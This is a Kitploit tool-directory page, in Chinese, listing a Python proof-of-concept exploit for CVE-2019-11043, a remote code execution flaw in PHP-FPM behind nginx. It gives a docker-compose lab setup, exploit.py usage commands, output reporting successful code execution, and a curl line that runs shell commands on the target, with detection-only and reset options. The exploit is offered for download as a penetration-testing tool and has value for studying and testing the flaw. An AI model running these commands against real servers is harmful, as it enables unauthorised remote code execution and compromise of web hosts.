Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-11043 — (PoC) Python version of CVE-2019-11043 exploit by neex | Kitploit
工具/GitHubGitHub/themiddleblue/cve-2019-11043
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubthemiddleblue/cve-2019-11043

CVE-2019-11043

(PoC) Python version of CVE-2019-11043 exploit by neex

查看仓库
146456年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-11043 概念验证

CVE-2019-11043 漏洞利用的 Python 版本 https://github.com/neex/phuip-fpizdam
此概念验证仍为草案,请使用由 @neex 编写的利用工具
漏洞分析:https://paper.seebug.org/1064/

概念验证环境搭建

运行 docker compose 启动 nginx 和 php-fpm:

root@kitploit:~
# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

如果你想查看 php-fpm 日志,可执行:

root@kitploit:~
docker logs --tail 10 --follow php

利用

root@kitploit:~
# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

如果只想检测漏洞而不进行利用:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

你可以尝试使用 --reset 杀掉 php-fpm 进程并重置所有注入的 PHP 设置:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --reset

视频演示

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

下载工具